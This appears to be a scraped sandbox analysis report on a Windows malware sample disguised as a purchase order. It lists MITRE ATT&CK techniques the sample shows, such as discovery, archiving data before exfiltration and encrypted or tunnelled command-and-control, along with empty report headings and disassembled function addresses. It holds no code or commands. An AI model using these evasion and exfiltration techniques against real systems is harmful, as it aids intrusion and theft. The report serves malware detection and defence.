Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report NEW PURCHASE ORDER.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

Function 0040315C, Relevance: 75.5, APIs: 36, Strings: 7, Instructions: 265
windowregistrymemoryCOMMON

Function 00401000, Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Function 00401928, Relevance: 105.7, APIs: 53, Strings: 7, Instructions: 700
windowCOMMONCrypto

Function 0040388A, Relevance: 21.1, APIs: 14, Instructions: 119
windowtimeCOMMON

Function 00404E0F, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 91
memorywindowstringCOMMON

Function 00402398, Relevance: 84.5, APIs: 37, Strings: 11, Instructions: 461
windowCOMMON

Function 0040531A, Relevance: 61.6, APIs: 33, Strings: 2, Instructions: 331
windowstringCOMMON

Function 00402912, Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 293
windowCOMMON

Function 004046CC, Relevance: 51.1, APIs: 27, Strings: 2, Instructions: 309
windowCOMMON

Function 00402EEC, Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 222
windowCOMMON

Function 00403E95, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 201
COMMON

Function 004013B5, Relevance: 38.6, APIs: 19, Strings: 3, Instructions: 104
stringCOMMON

Function 00404195, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 162
windowstringCOMMON

Function 00402C46, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138
windowCOMMON

Function 00404AD7, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 131
memorywindowstringCOMMON

Function 00404C59, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 113
windowCOMMON

Function 004014EA, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 121
windowfilestringCOMMON

Function 00402DED, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 100
windowCOMMON

Function 00401677, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94
filewindowCOMMON

Function 00405866, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 69
windowstringCOMMON

Function 00404F82, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 63
memorystringCOMMON

Function 004043BA, Relevance: 18.1, APIs: 12, Instructions: 96
windowCOMMON

Function 004057AA, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 68
windowstringCOMMON

Function 0040508E, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 56
windowstringCOMMON

Function 004039F6, Relevance: 15.1, APIs: 10, Instructions: 134
windowstringCOMMON

Function 004051AE, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64
windowCOMMON

Function 00404601, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 63
stringwindowCOMMON

Function 00403BBF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 77
windowCOMMON

Function 00402355, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 80
windowCOMMON

Function 0040595A, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 79
COMMON

Function 0040502E, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28
stringwindowCOMMON

Function 0040348B, Relevance: 9.1, APIs: 6, Instructions: 134
COMMON

Function 00403CCC, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 81
COMMON

Function 004012DB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 71
COMMON

Function 00404109, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
windowCOMMON

Function 0040123D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48
COMMON

Function 00404DB2, Relevance: 7.5, APIs: 5, Instructions: 31
windowCOMMON

Function 0040179C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122
stringCOMMON

Function 004045B1, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
stringwindowCOMMON

Function 0040377C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21
windowCOMMON

Function 004018DD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27
windowCOMMON

Function 00405126, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
windowCOMMON

Function 0040517A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Function 004037BE, Relevance: 5.1, APIs: 4, Instructions: 63
memoryCOMMON

Function 004036F9, Relevance: 5.1, APIs: 4, Instructions: 51
memorystringCOMMON

Function 004BA019, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370
timeCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre